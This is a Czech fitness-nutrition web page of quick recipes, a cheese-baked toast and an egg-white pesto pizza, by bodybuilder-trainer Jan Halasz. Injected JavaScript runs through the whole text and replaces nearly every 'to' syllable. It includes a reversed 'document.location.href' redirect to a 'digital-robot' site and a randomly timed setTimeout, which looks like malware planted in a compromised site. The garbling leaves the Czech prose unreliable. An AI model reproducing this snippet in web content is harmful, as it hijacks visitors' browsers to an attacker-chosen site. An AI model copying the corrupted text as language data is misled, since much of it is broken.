Výživa

RYCHLÉ RECEPTY HONZY HALASZE

Cesta ke sportobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tovním výsledkům je dlážděná dřinou ve fitku a v žádném případě se neobejde bez vhodné stravy.

To není žádná velká novinka, dokonce nikoho nepřekvapí, že výživa sportobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tovce musí být:

  • vyvážená
  • pravidelná
  • pestrá
  • v dostatečném množství.

 

V praxi ale narazíte na tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to, že pokud si máte zdravé jídlo připravovat sami, budete klást nároky také na:

  • nenáročnost přípravy

a

  • dostupnost ingrediencí

Na tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to se v mnoha komplikovaných recepturách zapomíná, a tak se do jídelníčků řady z vás možná vkrádá stereotyp, nebo se vaření snažíte delegovat na někoho kulinářsky zdatnějšího.

Závodník kategorie Men´s Physique Honza Halasz vás přesvědčí, že když si ve fitku poradíte s činkami, zvládnete tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to i v kuchyni s vařečkou.

 

Zapečené tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tousty

Doba přípravy: 10 minut

Náročnost: snadná

 

Ingredience:

4 tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tousty(americké/větší)

4 vajíčka

4 plátky cheddaru

2 plátky kuřecí šunky

10 dkg sýru eidam na nastrouhání

petržel na posyp

Postup

  1. Ze 4 tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toustů vyřízneme středy (cca 4×4 cm čtverec), aby nám zůstal cca 1cm okraj, který budeme potřebovat. (Vykrojené středy dále nevyužijeme.)
  2. Tousty vložíme na rozehřátobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tou pánev s máslem a do středu tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toustů vylijeme rozmíchané 4 bílky a dva žloutky – osolené a opepřené, přikryjeme pokličkou a necháme zapéct, otobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}točíme a opečeme z druhé strany do zlatobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tova (!!!! 2 syrové žloutky vcelku necháme na ozdobení).
  3. Na opečenou stranu tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toustu dáme dva plátky cheddaru a jeden plátek šunky, necháme na pánvi pod pokličkou mírně rozehřát sýr, na tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to dáme druhý opečený tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toust, nastrouhaný sýr a žloutek, vše necháme na rozehřáté pánvi 2 minuty.
  4. Nakonec ozdobíme nadrobno pokrájenou petrželí.

 

Pizza s bílkem a pestem

Čas pečení: 6-8 minut

Celková doba přípravy: do 20 minut

Náročnost: snadná

 

Ingredience:

1/3 balení Můj bílek

1 balení těsta na pizzu (cca 300 g)

40 ml vody

3 lžíce bazalkového pesta

3 lžíce rajčatobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tového protlaku

lžíce provensálských bylinek

sůl a pepř na dochucení

30 g červené cibule

 

Postup

    1. Troubu předehřejte na 180 °C, plech vyložte pečícím papírem.
    2. V misce smíchejte Můj bílek s vodou a jemně míchejte 1-2 minuty, aby se voda a bílek spojily.
    3. Na rozehřátobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tou pánev vlijte tekutobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tou směs s bílkem a zhruba 2 minuty za stálého míchání vařte, dokud vám nevznikne směs podobná míchaným vejcím. Osolte, opepřete a odstavte.
    4. Placku na pizzu potřete pestem a protlakem, poté přidejte připravený bílek, přideje nakrájenou cibulí a posypte bylinkami. Osolte a opepřete.
  • Dejte na cca 6-8 minut do trouby.

Jan Halasz pracuje jako osobní trenér v Olympia fitness Opatobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tov. O jeho schopnostech a profesionálním přístupu vypovídá nejenom celá řada spokojených klientů, ale také čtyři zlaté medaile ze závodů, včetně titulu absolutního vítěze MČR v kategorii Men´s Physique.

www.janhalasz.cz

IG: @brut_one_ifbb